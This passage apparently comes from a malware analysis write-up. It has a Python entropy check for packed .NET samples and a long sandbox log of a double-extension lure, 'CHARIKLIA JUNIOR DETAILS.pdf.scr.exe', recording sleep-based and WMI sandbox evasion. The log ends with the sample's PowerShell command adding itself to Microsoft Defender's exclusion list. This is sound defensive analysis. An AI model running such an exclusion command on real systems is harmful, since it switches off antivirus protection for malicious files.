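TEXT_SECTION = ("push ebp\nmov ebp, esp\nsub esp, 0x40\n" * 32).encode()

# The first list is copied from the report row for bKajDlMRoWfFMCaojU.cs; the second is a
# constructed set of names as an unobfuscated WinForms class would carry them.
OBFUSCATED_NAMES = ['UOsDt5k7Xi', 'CrZDep1ihZ', 'zAnDD4SuGB', 'TBYDoNkqti', 'ud1D3U3Uhb',
                    'ERfDnsuMch', 'Dispose', 'I5a1E3txgm', 'rBa1IlpesI', 'DFB1NgC42a']
ORDINARY_NAMES = ['InitializeComponent', 'Dispose', 'ToString', 'GetHashCode', 'Equals',
                  'OnLoad', 'button1_Click', 'textBox1_TextChanged']


if __name__ == "__main__":
    for label, body in (("uniform", UNIFORM_SECTION), ("zeros", ZERO_SECTION), ("text", TEXT_SECTION)):
        print(f"{label:8s} entropy={shannon_entropy(body):.3f} packed={looks_packed(body)}")
    for cls, h in name_entropy_report({"obfuscated": OBFUSCATED_NAMES, "ordinary": ORDINARY_NAMES}).items():
        print(f"{cls:11s} method-name entropy={h}")
```

Entropy alone does not separate a packer from a legitimately compressed resource, so the byte-level number is only worth acting on together with the other two findings in this section: Assembly.Load(byte[]) on a blob the code carries with it, and the renamed methods.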

                  Hooking and other Techniques for Hiding and Protection

                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (4 times)
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (3 times)
                  Source: Possible double extension: pdf.scr | Static PE information: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Process information set: NOOPENFILEERRORBOX (41 times)
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  Source: Yara match | File source: Process Memory Space: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe PID: 7492, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Memory allocated: 1150000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Memory allocated: 2D70000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Memory allocated: 1320000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Memory allocated: 7B40000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Memory allocated: 8B40000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Memory allocated: 8CF0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Memory allocated: 9CF0000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Memory allocated: 1670000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Memory allocated: 3200000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Memory allocated: 2E60000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Thread delayed: delay time: 922337203685477
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Thread delayed: delay time: 600000
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Thread delayed: delay time: 599875
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Thread delayed: delay time: 599765
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Thread delayed: delay time: 599656
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Thread delayed: delay time: 599547
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Thread delayed: delay time: 599437
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Thread delayed: delay time: 599327
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Thread delayed: delay time: 599218
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Thread delayed: delay time: 599109
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Thread delayed: delay time: 598999
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Thread delayed: delay time: 598890
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Thread delayed: delay time: 598781
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Thread delayed: delay time: 598672
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Thread delayed: delay time: 598547
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Thread delayed: delay time: 598437
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Thread delayed: delay time: 598312
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Thread delayed: delay time: 598203
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Thread delayed: delay time: 598093
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Thread delayed: delay time: 597984
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Thread delayed: delay time: 597866
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Thread delayed: delay time: 597745
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Thread delayed: delay time: 597640
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Thread delayed: delay time: 597528
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Thread delayed: delay time: 597422
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Thread delayed: delay time: 597308
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Thread delayed: delay time: 597203
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Thread delayed: delay time: 597094
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Thread delayed: delay time: 596984
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Thread delayed: delay time: 596875
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Thread delayed: delay time: 596766
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Thread delayed: delay time: 596656
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Thread delayed: delay time: 596547
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Thread delayed: delay time: 596437
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Thread delayed: delay time: 596328
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Thread delayed: delay time: 596219
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Thread delayed: delay time: 596107
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Thread delayed: delay time: 596000
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Thread delayed: delay time: 595891
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Thread delayed: delay time: 595781
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Thread delayed: delay time: 595672
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Thread delayed: delay time: 595562
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Thread delayed: delay time: 595453
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Thread delayed: delay time: 595344
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Thread delayed: delay time: 595234
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Thread delayed: delay time: 595125
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Thread delayed: delay time: 595015
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Thread delayed: delay time: 594906
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Thread delayed: delay time: 594797
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Thread delayed: delay time: 594687
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Thread delayed: delay time: 594578
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Thread delayed: delay time: 594469
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5910Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3782Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeWindow / User API: threadDelayed 2688Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeWindow / User API: threadDelayed 7160Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 7512Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7916Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep count: 38 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -35048813740048126s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8008Thread sleep count: 2688 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -599875s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8008Thread sleep count: 7160 > 30Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -599765s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -599656s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -599547s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -599437s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -599327s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -599218s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -599109s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -598999s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -598890s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -598781s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -598672s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -598547s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -598437s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -598312s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -598203s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -598093s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -597984s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -597866s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -597745s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -597640s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -597528s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -597422s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -597308s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -597203s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -597094s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -596984s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -596875s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -596766s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -596656s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -596547s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -596437s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -596328s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -596219s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -596107s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -596000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -595891s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -595781s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -595672s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -595562s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -595453s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -595344s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -595234s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -595125s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -595015s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -594906s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -594797s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -594687s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -594578s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe TID: 8004Thread sleep time: -594469s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 599875Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 599765Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 599656Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 599547Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 599437Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 599327Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 599218Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 599109Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 598999Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 598890Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 598781Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 598672Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 598547Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 598437Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 598312Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 598203Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 598093Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 597984Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 597866Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 597745Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 597640Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 597528Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 597422Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 597308Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 597203Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 597094Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 596984Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 596875Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 596766Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 596656Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 596547Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 596437Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 596328Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 596219Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 596107Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 596000Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 595891Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 595781Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 595672Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 595562Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 595453Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 595344Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 595234Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 595125Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 595015Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 594906Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 594797Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 594687Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 594578Jump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeThread delayed: delay time: 594469Jump to behavior
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000005.00000002.3858284388.00000000012C0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll2
                  Source: CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000000.00000002.1428858547.0000000007230000.00000004.08000000.00040000.00000000.sdmp, CHARIKLIA JUNIOR DETAILS.pdf.scr.exe, 00000000.00000002.1424716965.0000000003D79000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: HLssqEMUhi
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe"
Source: C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\CHARIKLIA JUNIOR DETAILS.pdf.scr.exe"
